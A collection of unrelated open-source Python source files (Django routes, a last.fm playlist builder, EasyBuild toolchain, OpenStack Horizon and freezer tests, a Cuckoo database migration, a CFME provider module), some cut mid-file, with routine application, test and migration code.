url(r'^(?P<url_id>\w+)/config/save/$', views.RoomConfView.save_config, name='rooms_conf_save'), url(r'^(?P<url_id>\w+)/export/m_app/$', views.ExportView.m_app, name='export_mapp'), url(r'^(?P<url_id>\w+)/export/csv/$', views.ExportView.csv, name='export_csv'), url(r'^org/admin/geo_icons/$', views.IconsView.table, name='geo_icons'), url(r'^org/admin/geo_points/$', views.PlacesView.table, name='geo_points'), url(r'^org/admin/stats/$', views.AdminView.dashboard, name='org_dashboard'), url(r'^org/admin/newconf/$', views.ConferenceView.create_conf, name='create_conf'), url(r'^org/admin/createroom/$', views.ConferenceView.create_room, name='create_room'), url(r'^org/admin/createtag/$', views.EventEditView.create_event_tag, name='create_event_tag'), url(r'^org/admin/saveconf/$', views.ConferenceView.save_conf, name='save_conf'), url(r'^org/admin/users/$', views.AdminView.users, name='org_users'), url(r'^org/admin/$', views.AdminView.conf_list, name='org_conf_list'), url(r'^export/conference_list/$', views.ExportView.conf_list, name='conf_list_export'), url(r'^(?P<url_id>\w+)/admin/$', views.AdminView.dashboard, name='dashboard'), url(r'^(?P<url_id>\w+)/admin/conf/edit/$', views.ConferenceView.edit_conf, name='edit_conf'), url(r'^(?P<url_id>\w+)/admin/saveconf/$', views.ConferenceView.save_conf, name='save_conf_urlid'), url(r'^(?P<url_id>\w+)/admin/pages/$', views.PagesView.pages_list, name='admin_pages'), url(r'^(?P<url_id>\w+)/admin/page/(?P<page>\d+)/edit/$', views.PagesView.edit_page, name='edit_page'), url(r'^(?P<url_id>\w+)/admin/page/(?P<page>\d+)/save/$', views.PagesView.save_page, name='save_page'), url(r'^(?P<url_id>\w+)/admin/users/$', views.AdminView.users, name='speakers'), url(r'^(?P<url_id>\w+)/admin/sched/edit/$', views.TimetableView.view_timetable, name='adminsched'), 
url(r'^(?P<url_id>\w+)/admin/sched/edit/saveTable/$', views.TimetableView.save_timetable, name='saveTable'), url(r'^(?P<url_id>\w+)/admin/sched/edit/saveEvent/$', views.TimetableView.save_event, name='saveEvent'), url(r'^(?P<url_id>\w+)/admin/sched/edit/popover/$', views.EventView.get_admin_popover, name='eventPop_admin'), url(r'^(?P<url_id>\w+)/admin/eventlist/$', views.EventEditView.event_view, name='editEvent'), url(r'^(?P<url_id>\w+)/admin/eventlist/(?P<id>\d+)/$', views.EventEditView.event_view, name='editEvent'), url(r'^(?P<url_id>\w+)/admin/eventlist/editEvent/(?P<id>\d+)/$', views.EventEditView.event_save, name='editEvent2'), url(r'^(?P<url_id>\w+)/admin/import/$', views.ImportView.import_view, name='import'), url(r'^(?P<url_id>\w+)/admin/import/json/$', views.ImportView.json_upload, name='json_import'), url(r'^(?P<url_id>\w+)/admin/export/$', views.ExportView.export_view, name='export'), url(r'^activate/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',views.RegisterView.activate_email , name='activate_email'), ] urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
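A hedged sketch of resolving one of the named routes above; it needs a configured Django project that includes this URLconf, and the url_id value is made up:

from django.urls import reverse

url = reverse('confla:schedule', kwargs={'url_id': 'devconf'})
# -> '/devconf/sched/' (modulo any project-level prefix)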
anselmobd/fo2
src/itat/views/views.py
Python
mit
131
0
from pprint import pprint from django.shor
tcuts import render def index(request): return render(requ
est, 'itat/index.html')
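A hedged sketch of a urls.py entry that would route to the view above; the pattern and route name are assumptions, not taken from the repo:

from django.urls import path
from itat.views import views

urlpatterns = [
    path('', views.index, name='index'),
]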
pdevetto/misc
lastfm/playlist.py
Python
gpl-3.0
7,352
0.010473
# -*- coding: utf-8 -*-
import ConfigParser, sys, os, urllib2, json, time, shutil, filecmp
import unicodedata
import Levenshtein

config = ConfigParser.ConfigParser()
config.read("config.ini")

def clean(chaine):
    #print chaine
    return chaine.lower().strip()

def decode(chaine):
    chaine = chaine.replace(u"\u2018", "'").replace(u"\u2019", "'")
    try:
        chaine = unicodedata.normalize('NFKD', chaine).encode('ascii','ignore')
        return chaine
    except:
        return chaine

def remove_accents(input_str):
    try:
        nkfd_form = unicodedata.normalize('NFKD', unicode(input_str))
        return u"".join([c for c in nkfd_form if not unicodedata.combining(c)])
    except:
        return input_str

def cc(i):
    return decode(clean(remove_accents(i)))

def getKey(item):
    return item[0]

class playlist:
    def __init__(self, limit, page=1, period="overall"):
        self.api_key = config.get("lastfm"
,'key') self.music_dir = config.get("lastfm",'directory') self.page = page self.mp_dir = config.get("lastfm",'mudir') self.user = conf
ig.get("lastfm",'user')
        self.dossier = os.listdir(self.music_dir)
        self.period = period
        self.limit = limit
        self.notfound = []
        #for i in req!

    def lastfm(self, meth):
        try:
            url = 'http://ws.audioscrobbler.com/2.0/?api_key='+self.api_key+'&autocorrect=1'+meth+'&format=json&page='+str(self.page)
            txt = urllib2.urlopen(url).read()
            return json.loads(txt)
        except urllib2.HTTPError:
            #print '\n Error : '+art
            return None

    def toptracks(self):
        url = '&method=user.gettoptracks&user='+self.user+'&limit='+self.limit+'&period='+self.period;
        req = self.lastfm(url)
        for i in req["toptracks"]["track"]:
            #if cc(i['artist']['name']) == "high tone":
            yield {'name':i['name'],'artist':cc(i['artist']['name'])}

    def findartist(self, artist):
        """Search for the artist directory: exact match, or Levenshtein distance lower than length minus 2"""
        textlog = " find (" + artist + "):\n"
        lev = {}
        # Each artist in the directory
        for art in self.dossier:
            ar = cc(art)
            # Exact match (no uppercase, no accents, no spaces)
            if ar == artist:
                ##print "YES BITCH"
                return art
            # Levenshtein distance: store it if the difference is not too large
            elif abs(len(ar) - len(artist)) < 5:
                l = Levenshtein.distance(ar, artist)
                if l < (len(art)/2):
                    if not l in lev.keys():
                        lev[l] = []
                    lev[l].append(art)
        # Process the candidates
        textlog += str(lev) + "\n"
        if lev != {} and len( lev[min(lev.keys())] ) == 1:
            ##print lev[min(lev.keys())][0]
            ##print "YES BIS BITCHY BITCH"
            return lev[min(lev.keys())][0]
        else:
            pass
            ##print textlog

    def findtrack(self, artist, track, i=0, lev=False):
        """Search for a track file under the artist directory: exact substring match, or Levenshtein distance lower than the track name length"""
        # Each entry in the directory
        base = self.music_dir + "/" + artist
        for fil in os.listdir(base):
            if os.path.isdir(base +"/"+ fil):
                ##print ("findtrack " + artist + " / " + fil + " - " + track)
                try:
                    for result in self.findtrack(artist + "/" + fil, track, i=i+1, lev=lev):
                        yield result
                except UnicodeDecodeError:
                    pass
            if os.path.isfile(base +"/"+ fil):
                if lev:
                    nfil = cc(clean(unicode(fil[:-4],'utf-8')))
                    ntr = cc(clean(track))
                    l = Levenshtein.distance(ntr, nfil)
                    if l < len(ntr):
                        ##print "lev |" + ntr + "|" + nfil + "|"
                        ##print str(l) + " - " + str(len(cc(track)))
                        yield [l, base+"/"+fil]
                else:
                    if clean(track) in clean(unicode(fil,'utf-8')):
                        ##print base+"/"+fil
                        yield base+"/"+fil

    def mkdirs(self, li, pat):
        if li != []:
            dd = os.path.join(pat, li[0])
            if not os.path.isdir( dd ):
                ##print "mkdir(" + dd+")"
                os.mkdir(dd)
            return self.mkdirs(li[1:], dd)
        else:
            return pat

    def move(self, t):
        dirs = t[len(self.music_dir)+1:].split("/")
        new = self.mkdirs(dirs[:-1], self.mp_dir)
        dst = os.path.join(new, dirs[-1])
        if os.path.isfile( dst ):
            if os.path.getsize(t) != os.path.getsize(dst):
                os.remove(dst)
            else:
                return 1
        shutil.copyfile(t, dst)
        ##print "exist"
        #shutil.copyfile(t, dst)

    def findtrackall(self, a, i):
        for t in self.findtrack(a, i['name']):
            return t
        ##print "### :: " + i['artist'] + '-' + i['name'] + ""
        ties = []
        for t in self.findtrack(a, i['name'], lev=True):
            ties.append(t)
        if len(ties) == 0:
            return 0
        if len(ties) == 1:
            ##print ties[0][1]
            return ties[0][1]
        else:
            ties = sorted(ties, key=getKey)
            ##print ties[0][1]
            return ties[0][1]

    def run(self):
        file = time.strftime("TOP"+self.limit+"_%m%d%H%M.m3u")
        fo = open(file, 'w+')
        number = 0
        for i in self.toptracks():
            number += 1
            print number
            #for i in [{'name':u"The sound of silence",'artist':u"Simon and Garfunkel"}]:
            a = self.findartist(i['artist'])
            t = 0
            if a:
                t = self.findtrackall(a, i)
            if t == 0:
                t = self.findtrackall("Various Artists", i)
            ##print t
            if t != 0:
                fo.write(t+"\n")
                if 
os.path.isdir( self.mp_dir ): self.move(t) else: #print "###########" #print i['artist'] + '-' + i['name'] pass #print self.notfound #print '--finished--' fo.close() # <?xml version="1.0" encoding="UTF-8"?> # <playlist version="1" xmlns="http://xspf.org/ns/0/"> # <trackList> # <track><location>file:///media/data/Musique/Cypress Hill/2010 - Rise Up/Cypress Hill - Rise Up - 13 - Armed and Dangerous.mp3</location></track> # <track><location>file:///media/data/Musique/The Black Keys/Attack &amp; Release/The Black Keys - Psychotic Girl.mp3</location></track> # <track><location>file:///media/data/Musique/Odezenne/2012 - OVNI edition Louis XIV/13 - Hirondelles.mp3</location></track> # </trackList> # </playlist> pass if len(sys.argv) == 0 : print "usage : python playlist.py length page" else: if len(sys.argv) <= 1 : p = playlist(100) elif len(sys.argv) <= 2 : p = playlist(sys.argv[1]) elif len(sys.argv) <= 3 : p = playlist(sys.argv[1], sys.argv[2]) else: p = playlist(sys.argv[1], sys.argv[2], sys.argv[3]) p.run()
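A hedged sketch of the fuzzy-match rule findartist() applies above, shown in isolation (Python 2, matching the script; the strings are made up):

import Levenshtein

candidate = 'the black keys'  # directory name, as cleaned by cc()
query = 'black keys'          # artist name from last.fm, as cleaned by cc()
d = Levenshtein.distance(candidate, query)
print d, d < (len(candidate) / 2)  # 4 True -> kept as a fuzzy candidate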
hpcugent/easybuild-framework
easybuild/toolchains/gomkl.py
Python
gpl-2.0
1,727
0.001737
## # Copyright 2012-2021 Ghent University # # This file is part of EasyBuild, # originally created by
the HPC team of Ghent University (ht
tp://ugent.be/hpc/en), # with support of Ghent University (http://ugent.be/hpc), # the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be), # Flemish Research Foundation (FWO) (http://www.fwo.be/en) # and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en). # # https://github.com/easybuilders/easybuild # # EasyBuild is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation v2. # # EasyBuild is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with EasyBuild. If not, see <http://www.gnu.org/licenses/>. ## """ EasyBuild support for gomkl compiler toolchain (includes GCC, OpenMPI, Intel Math Kernel Library (MKL) and Intel FFTW wrappers). :author: Stijn De Weirdt (Ghent University) :author: Kenneth Hoste (Ghent University) :author: Ake Sandgren (Umea University) """ from easybuild.toolchains.gompi import Gompi from easybuild.toolchains.gmkl import Gmkl from easybuild.toolchains.fft.intelfftw import IntelFFTW from easybuild.toolchains.linalg.intelmkl import IntelMKL class Gomkl(Gompi, IntelMKL, IntelFFTW): """Compiler toolchain with GCC, OpenMPI, Intel Math Kernel Library (MKL) and Intel FFTW wrappers.""" NAME = 'gomkl' SUBTOOLCHAIN = [Gompi.NAME, Gmkl.NAME]
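A hedged sketch showing that the toolchain above is assembled by plain multiple inheritance, so the method resolution order decides which compiler, MPI, linear-algebra, or FFT hook wins; this needs an EasyBuild installation to run:

from easybuild.toolchains.gomkl import Gomkl

for cls in Gomkl.__mro__:
    print(cls.__name__)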
trendels/rhino
examples/content_type_versioning.py
Python
mit
1,165
0.004292
import json from rhino import Mapper, get # Our internal representation report = { 'title': 'foo', 'author': 'Fred', 'date': '2015-01-09', 'tags': ['a', 'b', 'c'], } # Base class for our representations class report_repr(object
): @classmethod def serialize(cls, report): obj = dict([(k, report[k]) for k in cls.fields]) return json.dumps(obj, sort_keys=True) # Different versions of the representation class report_v1(report_repr): provides = 'application/vnd.acme.report+json;v=1' fields = ['title', 'author'] class report_v2(report_repr): provides = 'application/vnd.acme.report+json;v=2' fields
= ['title', 'author', 'date'] class report_v3(report_repr): provides = 'application/vnd.acme.report+json;v=3' fields = ['title', 'author', 'date', 'tags'] # One handler can handle multiple representations. # Here, report_v3 is the default when the client doesn't specify a preference. @get(produces=report_v1) @get(produces=report_v2) @get(produces=report_v3) def get_report(request): return report app = Mapper() app.add('/', get_report) if __name__ == '__main__': app.start_server()
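A hedged client-side sketch of negotiating a representation version against the running example (Python 2, matching the example; the host and port are assumptions, not documented rhino defaults):

import urllib2

req = urllib2.Request('http://localhost:9000/')
req.add_header('Accept', 'application/vnd.acme.report+json;v=2')
print urllib2.urlopen(req).read()
# {"author": "Fred", "date": "2015-01-09", "title": "foo"}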
NeCTAR-RC/horizon
openstack_dashboard/dashboards/admin/defaults/tests.py
Python
apache-2.0
6,926
0
# Copyright 2013 Kylin, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from django.urls import reverse import mock from openstack_dashboard import api from openstack_dashboard.test import helpers as test from openstack_dashboard.usage import quotas INDEX_URL = reverse('horizon:admin:defaults:index') class ServicesViewTests(test.BaseAdminViewTests): @test.create_mocks({ api.nova: [('default_quota_get', 'nova_default_quota_get')], api.cinder: [('default_quota_get', 'cinder_default_quota_get'), 'is_volume_service_enabled'], api.base: ['is_service_enabled'], api.neutron: [('default_quota_get', 'neutron_default_quota_get')], quotas: ['enabled_quotas']}) def test_index(self): # Neutron does not have an API for getting default system # quotas. When not using Neutron, the floating ips quotas # should be in the list. self.mock_is_volume_service_enabled.return_value = True self.mock_is_service_enabled.return_value = True compute_quotas = [q.name for q in self.quotas.nova] self.mock_enabled_quotas.return_value = compute_quotas self.mock_nova_default_quota_get.return_value = self.quotas.nova self.mock_cinder_default_quota_get.return_value = \ self.cinder_quotas.first() self.mock_neutron_default_quota_get.return_value = \ self.neutron_quotas.first() res = self.client.get(INDEX_URL) self.assertTemplateUsed(res, 'admin/defaults/index.html') expected_data = [ '<Quota: (injected_file_content_bytes, 1)>', '<Quota: (metadata_items, 1)>', '<Quota: (injected_files, 1)>', '<Quota: (ram, 10000)>', '<Quota: (instances, 10)>', '<Quota: (cores, 10)>', '<Quota: (key_pairs, 100)>', '<Quota: (server_groups, 10)>', '<Quota: (server_group_members, 10)>', '<Quota: (injected_file_path_bytes, 255)>', ] self._check_quotas_data(res, 'compute_quotas', expected_data) expected_data = [ '<Quota: (gigabytes, 1000)>', '<Quota: (snapshots, 1)>', '<Quota: (volumes, 1)>', ] self._check_quotas_data(res, 'volume_quotas', expected_data) expected_data = [ '<Quota: (network, 10)>', '<Quota: (subnet, 10)>', '<Quota: (port, 50)>', '<Quota: (router, 10)>', '<Quota: (floatingip, 50)>', '<Quota: (security_group, 20)>', '<Quota: (security_group_rule, 100)>', ] self._check_quotas_data(res, 'network_quotas', expected_data) self.mock_is_volume_service_enabled.assert_called_once_with(
test.IsHttpRequest()) self.assertEqual(2, self.mock_is_service_enabled.call_count) self.mock_is_service_enabled.assert_has_calls([ mock.call(test.IsHttpRequest(), 'compute'), mock.call(test.IsHttpRequest(), 'network')]) self.assert_mock_multiple_calls_with_same_arguments(
self.mock_enabled_quotas, 4, mock.call(test.IsHttpRequest())) self.mock_nova_default_quota_get.assert_called_once_with( test.IsHttpRequest(), self.tenant.id) self.mock_cinder_default_quota_get.assert_called_once_with( test.IsHttpRequest(), self.tenant.id) self.mock_neutron_default_quota_get.assert_called_once_with( test.IsHttpRequest()) def _check_quotas_data(self, res, slug, expected_data): quotas_tab = res.context['tab_group'].get_tab(slug) self.assertQuerysetEqual(quotas_tab._tables[slug].data, expected_data, ordered=False) class UpdateDefaultQuotasTests(test.BaseAdminViewTests): def _get_quota_info(self, quota): quota_data = {} updatable_quota_fields = (quotas.NOVA_QUOTA_FIELDS | quotas.CINDER_QUOTA_FIELDS) for field in updatable_quota_fields: if field != 'fixed_ips': limit = quota.get(field).limit or 10 quota_data[field] = int(limit) return quota_data @test.create_mocks({ api.nova: [('default_quota_update', 'nova_default_quota_update'), ('default_quota_get', 'nova_default_quota_get')], api.cinder: [('default_quota_update', 'cinder_default_quota_update'), ('default_quota_get', 'cinder_default_quota_get')], quotas: ['get_disabled_quotas']}) def test_update_default_quotas(self): quota = self.quotas.first() + self.cinder_quotas.first() self.mock_get_disabled_quotas.return_value = set() self.mock_nova_default_quota_get.return_value = self.quotas.first() self.mock_nova_default_quota_update.return_value = None self.mock_cinder_default_quota_get.return_value = \ self.cinder_quotas.first() self.mock_cinder_default_quota_update.return_value = None # update some fields quota[0].limit = 123 quota[1].limit = -1 updated_quota = self._get_quota_info(quota) url = reverse('horizon:admin:defaults:update_defaults') res = self.client.post(url, updated_quota) self.assertNoFormErrors(res) self.assertRedirectsNoFollow(res, INDEX_URL) self.mock_get_disabled_quotas.assert_called_once_with( test.IsHttpRequest()) nova_fields = quotas.NOVA_QUOTA_FIELDS nova_updated_quota = dict((key, updated_quota[key]) for key in nova_fields if key != 'fixed_ips') self.mock_nova_default_quota_get.assert_called_once_with( test.IsHttpRequest(), self.request.user.tenant_id) self.mock_nova_default_quota_update.assert_called_once_with( test.IsHttpRequest(), **nova_updated_quota) cinder_updated_quota = dict((key, updated_quota[key]) for key in quotas.CINDER_QUOTA_FIELDS) self.mock_cinder_default_quota_get.assert_called_once_with( test.IsHttpRequest(), self.request.user.tenant_id) self.mock_cinder_default_quota_update.assert_called_once_with( test.IsHttpRequest(), **cinder_updated_quota)
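A self-contained, hedged sketch of the mock pattern these tests lean on, reduced to the bare library calls (the quota value is made up):

import mock

api = mock.Mock()
api.default_quota_get.return_value = {'instances': 10}
assert api.default_quota_get('request', 'tenant-id') == {'instances': 10}
api.default_quota_get.assert_called_once_with('request', 'tenant-id')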
cuckoobox/cuckoo
cuckoo/private/db_migration/versions/from_1_1_to_1_2-added_states.py
Python
mit
7,228
0.004289
# Copyright (C) 2010-2013 Claudio Guarnieri. # Copyright (C) 2014-2016 Cuckoo Foundation. # This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org # See the file 'docs/LICENSE' for copying permission. """Added failed statuses to tasks (from Cuckoo 1.1 to 1.2) Revision ID: 495d5a6edef3 Revises: 18eee46c6f81 Create Date: 2015-02-28 19:08:29.284111 """ # Spaghetti as a way of life. # Revision identifiers, used by Alembic. revision = "495d5a6edef3" down_revision = "18eee46c6f81" import sqlalchemy as sa from datetime import datetime from alembic import op from dateutil.parser import parse import cuckoo.core.database as db def upgrade(): conn = op.get_bind() # Deal with Alembic shit. # Alembic is so ORMish that it was impossible to write code which works on different DBMS. if conn.engine.driver == "psycopg2": # Altering status ENUM. # This shit of raw SQL is here because alembic doesn't deal well with alter_colum of ENUM type. # Commit because SQLAlchemy doesn't support ALTER TYPE in a transaction. op.execute('COMMIT') conn.execute("ALTER TYPE status_type ADD VALUE 'failed_reporting'") else: # Read data. tasks_data = [] old_tasks = conn.execute("select id, target, category, timeout, priority, custom, machine, package, options, platform, memory, enforce_timeout, clock, added_on, started_on, completed_on, status, sample_id from tasks").fetchall() for item in old_tasks: d = {} d["id"] = item[0] d["target"] = item[1] d["category"] = item[2] d["timeout"] = item[3] d["priority"] = item[4] d["custom"] = item[5] d["machine"] = item[6] d["package"] = item[7] d["options"] = item[8] d["platform"] = item[9] d["memory"] = item[10] d["enforce_timeout"] = item[11] if isinstance(item[12], datetime): d["clock"] = item[12] elif item[12]: d["clock"] = parse(item[12]) else: d["clock"] = None if isinstance(item[13], datetime): d["added_on"] = item[13] elif item[13]: d["added_on"] = parse(item[13]) else: d["added_on"] = None if isinstance(item[14], datetime): d["started_on"] = item[14] elif item[14]: d["started_on"] = parse(item[14]) else: d["started_on"] = None if isinstance(item[15], datetime): d["completed_on"] = item[15] elif item[15]: d["completed_on"] = parse(item[15]) else: d["completed_on"] = None d["status"] = item[16] d["sample_id"] = item[17] tasks_data.append(d) if conn.engine.driver == "mysqldb": # Disable foreign key checking to migrate table avoiding checks. op.execute('SET foreign_key_checks = 0') # Drop old table. op.drop_table("tasks") # Drop old Enum. sa.Enum(name="status_type").drop(op.get_bind(), checkfirst=False) # Create table with 1.2 schema. op.create_table( "tasks", sa.Column("id", sa.Integer(), nullable=False), sa.Column("target", sa.String(length=255), nullable=False), sa.Column("category", sa.String(length=255), nullable=False), sa.Column("timeout", sa.Integer(), server_default="0", nullable=False), sa.Column("priority", sa.Integer(), server_default="1", nullable=False), sa.Column("custom", sa.String(length=255), nullable=True), sa.Column("machine", sa.String(length=255), nullable=True), sa.Column("package", sa.String(length=255), nullable=True), sa.Column("options", sa.String(length=255), nullable=True), sa.Column("platform", sa.String(length=255), nullable=True), sa.Column("memory", sa.Boolean(), nullable=False, default=False), sa.Column("enforce_timeout", sa.Boolean(), nullable=False, default=False), sa.Column("clock", sa.DateTime(timezone=False), default=datetime.now, nullable=False), sa.Column("added_on", sa.DateTime(timezone=False), nullable=False), sa.Colum
n("started_on"
, sa.DateTime(timezone=False), nullable=True), sa.Column("completed_on", sa.DateTime(timezone=False), nullable=True), sa.Column("status", sa.Enum("pending", "running", "completed", "reported", "recovered", "failed_analysis", "failed_processing", "failed_reporting", name="status_type"), server_default="pending", nullable=False), sa.Column("sample_id", sa.Integer, sa.ForeignKey("samples.id"), nullable=True), sa.PrimaryKeyConstraint("id") ) op.execute('COMMIT') # Insert data. op.bulk_insert(db.Task.__table__, tasks_data) # Enable foreign key. op.execute('SET foreign_key_checks = 1') else: op.drop_table("tasks") # Create table with 1.2 schema. op.create_table( "tasks", sa.Column("id", sa.Integer(), nullable=False), sa.Column("target", sa.String(length=255), nullable=False), sa.Column("category", sa.String(length=255), nullable=False), sa.Column("timeout", sa.Integer(), server_default="0", nullable=False), sa.Column("priority", sa.Integer(), server_default="1", nullable=False), sa.Column("custom", sa.String(length=255), nullable=True), sa.Column("machine", sa.String(length=255), nullable=True), sa.Column("package", sa.String(length=255), nullable=True), sa.Column("options", sa.String(length=255), nullable=True), sa.Column("platform", sa.String(length=255), nullable=True), sa.Column("memory", sa.Boolean(), nullable=False, default=False), sa.Column("enforce_timeout", sa.Boolean(), nullable=False, default=False), sa.Column("clock", sa.DateTime(timezone=False), default=datetime.now, nullable=False), sa.Column("added_on", sa.DateTime(timezone=False), nullable=False), sa.Column("started_on", sa.DateTime(timezone=False), nullable=True), sa.Column("completed_on", sa.DateTime(timezone=False), nullable=True), sa.Column("status", sa.Enum("pending", "running", "completed", "reported", "recovered", "failed_analysis", "failed_processing", "failed_reporting", name="status_type"), server_default="pending", nullable=False), sa.Column("sample_id", sa.Integer, sa.ForeignKey("samples.id"), nullable=True), sa.PrimaryKeyConstraint("id") ) # Insert data. op.bulk_insert(db.Task.__table__, tasks_data) def downgrade(): pass
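A hedged, minimal skeleton of an Alembic revision in the same shape as the migration above; the revision identifiers and the added column are placeholders, not Cuckoo schema:

from alembic import op
import sqlalchemy as sa

revision = "000000000000"   # placeholder
down_revision = None        # placeholder

def upgrade():
    op.add_column("tasks", sa.Column("note", sa.String(length=255), nullable=True))

def downgrade():
    op.drop_column("tasks", "note")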
openstack/freezer-api
freezer_api/tests/unit/sqlalchemy/v2/test_action.py
Python
apache-2.0
19,604
0
# (c) Copyright 2018 ZTE Corporation. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Tests for manipulating Action via the DB API""" import copy from unittest import mock from unittest.mock import patch from freezer_api.common import exceptions as freezer_api_exc from freezer_api.tests.unit import common from freezer_api.tests.unit.sqlalchemy import base class DbActionTestCase(base.DbTestCase): def setUp(self): super(DbActionTestCase, self).setUp() self.fake_action_0 = common.get_fake_action_0() self.fake_action_2 = common.get_fake_action_2() self.fake_action_3 = common.get_fake_action_3() self.freezer_action_0 = self.fake_action_0.get('freezer_action') self.freezer_action_2 = self.fake_action_2.get('freezer_action') self.fake_project_id = self.fake_action_0.get('project_id') self.fake_user_id = self.fake_action_0.get('user_id') self.fake_action_id = common.get_fake_action_id() def test_add_and_get_action(self): action_doc = copy.deepcopy(self.fake_action_0) action_id = self.dbapi.add_action(user_id=self.fake_action_0. get('user_id'), doc=action_doc, project_id=self.fake_project_id) self.assertIsNotNone(action_id) result = self.dbapi.get_action(project_id=self.fake_project_id, user_id=self.fake_action_0. get('user_id'), action_id=action_id) self.assertIsNotNone(result) self.assertEqual(result.get('max_retries'), self.fake_action_0.get('max_retries')) self.assertEqual(result.get('max_retries_interval'), self.fake_action_0.get('max_retries_interval')) freezer_action = result.get('freezer_action') self.assertEqual(freezer_action.get('action'), self.freezer_action_0.get('action')) self.assertEqual(freezer_action.get('backup_name'), self.freezer_action_0.get('backup_name')) self.assertEqual(freezer_action.get('container'), self.freezer_action_0.get('container')) self.assertEqual(freezer_action.get('path_to_backup'), self.freezer_action_0.get('path_to_backup')) self.assertEqual(freezer_action.get('mode'), self.freezer_action_0.get('mode')) def test_add_and_delete_action(self): action_doc = copy.deepcopy(self.fake_action_0) action_id = self.dbapi.add_action(user_id=self.fake_action_0. get('user_id'), doc=action_doc, project_id=self.fake_project_id) self.assertIsNotNone(action_id) result = self.dbapi.delete_action(project_id=self.fake_project_id, user_id=self.fake_action_0. get('user_id'), action_id=action_id) self.assertIsNotNone(result) self.assertEqual(result, action_id) result = self.dbapi.get_action(project_id=self.fake_project_id, user_id=self.fake_action_0. get('user_id'), action_id=action_id) self.assertEqual(len(result), 0) def test_add_and_update_action(self): action_doc = copy.deepcopy(self.fake_action_0) action_id = self.dbapi.add_action(user_id=self.fake_action_0. get('user_id'), doc=action_doc, project_id=self.fake_project_id) self.assertIsNotNone(action_id) patch_doc = copy.deepcopy(self.fake_action_2) result = self.dbapi.update_action(project_id=self.fake_project_id, user_id=self.fake_action_2. 
get('user_id'), patch_doc=patch_doc, action_id=action_id) self.assertIsNotNone(result) self.assertEqual(result, action_id) result = self.dbapi.get_action(project_id=self.fake_project_id, user_id=self.fake_action_2. get('user_id'), action_id=action_id) self.assertEqual(result.get('max_retries'), self.fake_action_2.get('max_retries')) self.assertEqual(result.get('max_retries_interval'), self.fake_action_2.get('max_retries_interval')) freezer_action = result.get('freezer_action') self.assertEqual(freezer_action.get('action'), self.freezer_action_2.get('action')) def test_add_and_replace_action(self): action_doc = copy.deepcopy(self.fake_action_0) action_id = self.dbapi.add_action(user_id=self.fake_action_0. get('user_id'), doc=action_doc, project_id=self.fake_project_id) self.assertIsNotNone(action_id) patch_doc = copy.deepcopy(self.fake_action_2) result = self.dbapi.replace_action(project_id=self.fake_project_id, user_id=self.fake_action_2. get('user_id'), doc=patch_doc, action_id=action_id) self.assertIsNotNone(result) self.assertEqual(result, action_id) result = self.dbapi.get_action(project_id=self.fake_project_id, user_id=self.fake_action_2. get('user_id'), action_id=action_id) self.assertEqual(result.get('max_retries'), self.fake_action_2.get('max_retries')) self.assertEqual(result.get('max_retries_interval'), self.fake_action_2.get('max_retries_interval')) freezer_action = result.get('freezer_action') self.assertEqual(freezer_action.get('action'), self.freezer_action_2.get('action')) patch_doc1 = copy.deepcopy(self.fake_action_0) result = self.dbapi.replace_action(project_id=self.fake_project_id, user_id=self.fake_action_2. get('user_id'), doc=patch_doc1, action_id=self.fake_action_id)
self.assertIsNotNone(result) result = self.dbapi.get_action(project_id=self.fake_project_id, user_id=self.fake_action_2. get('user_id'), action_id=self.fake_action_id) self.assertEqual(result.get('action_id'), self.fake_action_id) def tes
t_add_and_search_action(self): count = 0 actionids = [] while(count < 20): doc = cop
lkhomenk/integration_tests
cfme/infrastructure/provider/rhevm.py
Python
gpl-2.0
6,107
0.003111
import attr from widgetastic.widget import View, Text from widgetastic_patternfly import Tab, Input, BootstrapSwitch, Button from wrapanapi.rhevm import RHEVMSystem from cfme.common.candu_views import VMUtilizationView from cfme.common.provider import CANDUEndpoint, DefaultEndpoint, DefaultEndpointForm from cfme.common.provider_views import BeforeFillMixin from cfme.exceptions import ItemNotFound from cfme.services.catalogs.catalog_items import RHVCatalogItem from cfme.utils import version from widg
etastic_manageiq import LineChart from . import InfraProvider class RHEVMEndp
oint(DefaultEndpoint): @property def view_value_mapping(self): tls_since_version = '5.8.0.8' return {'hostname': self.hostname, 'api_port': getattr(self, 'api_port', None), 'verify_tls': version.pick({ version.LOWEST: None, tls_since_version: getattr(self, 'verify_tls', None)}), 'ca_certs': version.pick({ version.LOWEST: None, tls_since_version: getattr(self, 'ca_certs', None)}) } class RHEVMEndpointForm(View): @View.nested class default(Tab, DefaultEndpointForm, BeforeFillMixin): # NOQA TAB_NAME = 'Default' api_port = Input('default_api_port') verify_tls = BootstrapSwitch(id='default_tls_verify') ca_certs = Input('default_tls_ca_certs') @View.nested class candu(Tab, BeforeFillMixin): # NOQA TAB_NAME = 'C & U Database' hostname = Input('metrics_hostname') api_port = Input('metrics_api_port') database_name = Input('metrics_database_name') username = Input('metrics_userid') password = Input('metrics_password') confirm_password = Input('metrics_verify') change_password = Text(locator='.//a[normalize-space(.)="Change stored password"]') validate = Button('Validate') class RHEVMVMUtilizationView(VMUtilizationView): """A VM Utilization view for rhevm providers""" vm_cpu = LineChart(id='miq_chart_parent_candu_0') vm_memory = LineChart(id='miq_chart_parent_candu_1') vm_disk = LineChart(id='miq_chart_parent_candu_2') 